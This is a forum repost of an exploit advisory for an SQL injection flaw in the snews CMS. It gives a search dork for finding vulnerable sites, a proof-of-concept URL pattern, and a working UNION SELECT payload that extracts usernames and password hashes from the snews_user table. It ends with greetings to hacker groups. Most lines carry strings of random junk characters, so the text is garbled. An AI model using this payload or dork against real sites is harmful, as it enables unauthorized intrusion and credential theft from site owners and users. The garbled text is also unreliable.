标题: CMS snews SQL Injection Vulnerability H. O: y9 w! W! e. v
作者: By onestree" J. t8 G( ^/ b, K( ]
下载地址 : http://snewscms.com/6 ?9 F& X. y9 B1 p8 g' @
测试平台 : ubuntu 12.10 / win 7# f7 e3 ?: e% w# i* g" q- ^5 I
关键词: inurl:"tanyakan pada rumput yang bergoyang"9 |; w! J; A. h7 j7 g& A6 l- g
9 O" N* P0 x, H
; W( ~0 [: x) ]8 d*************************************************************
( `9 P0 B( A, K" W% ]' C ' y/ B( a5 `7 r/ S5 Q* q% R
SQL poc:+ N& z0 `! p6 @: T1 A7 W2 l
( P$ [0 F) ]/ e: B3 l/ j
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]+ {5 p- _5 i) |2 y/ s' K
$ @9 @; X. J. |6 d' Y+ l, J
示例
1 g: w- g/ \3 f/ K. q, D . c" R0 E2 {' O5 B8 G& K6 p
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*4 z9 s% l2 b8 u; i$ E# C
* N. D* b' z3 {& E0 [
. b5 T- W; ^ j+ O& M' u致谢:" @$ K5 T' L0 M! t
& W2 f6 j3 J) [5 u1 i% X5 ~ Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
" Q: w# L8 [ L* u7 I* W: f
! m" ^+ _# Y, ]: E8 z3 u indonesiancoder - moeslimh4x0r - go-coder' _! B. V5 }; K+ E1 t
6 u! L! k5 X3 ~! t! Q7 Z mspesial my hunny :*
1 A" f5 G" Y: D4 J ~2 v |
发表于 2013-1-23 08:55:06
收藏
支持
反对